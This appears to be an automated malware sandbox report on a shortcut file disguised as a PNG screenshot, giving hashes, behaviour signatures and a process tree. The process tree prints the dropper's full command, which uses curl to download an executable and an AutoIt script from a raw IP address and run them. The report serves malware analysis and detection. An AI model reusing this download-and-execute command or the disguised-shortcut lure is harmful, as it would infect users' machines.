Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
20-11-2023 16:57
Static task
static1
Behavioral task
behavioral1
Sample
Screenshot_20_11_2023-4839.png.lnk
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
Screenshot_20_11_2023-4839.png.lnk
Resource
win10v2004-20231020-en
Behavioral task
behavioral3
Sample
Wire_Transfer_Recipient.pdf.lnk
Resource
win7-20231020-en
Behavioral task
behavioral4
Sample
Wire_Transfer_Recipient.pdf.lnk
Resource
win10v2004-20231023-en
General
-
Target
Screenshot_20_11_2023-4839.png.lnk
-
Size
1KB
-
MD5
d3d3ffd5ffa81dcdef3cf7e606562d4c
-
SHA1
dc86ae5e975f08d86052208dbaf182d55e8aedfc
-
SHA256
3ee01212c840eaee1d11c78169d1deb7f9fa133cbb12f105918328f36afdd971
-
SHA512
075e69dd2a59ab7da5eb9e03b1753cd6870b2958c3998887e150cd2182aadfbdd90038fc8b88b49a64a9b7896b002057c73b0b7ae952856b43d8159006f6527e
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2680 PING.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1828 wrote to memory of 2668 1828 cmd.exe 29 PID 1828 wrote to memory of 2668 1828 cmd.exe 29 PID 1828 wrote to memory of 2668 1828 cmd.exe 29 PID 2668 wrote to memory of 2680 2668 cmd.exe 30 PID 2668 wrote to memory of 2680 2668 cmd.exe 30 PID 2668 wrote to memory of 2680 2668 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Screenshot_20_11_2023-4839.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /min /b ping -n 4 localhost > nul && curl -s -o "C:\Users\Public\Seed.exe" http://45.154.98.21/Seed.exe && curl -s -o "C:\Users\Public\leaf.au3" http://45.154.98.21/leaf.au3 && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\PING.EXEping -n 4 localhost3⤵
- Runs ping.exe
PID:2680
-
-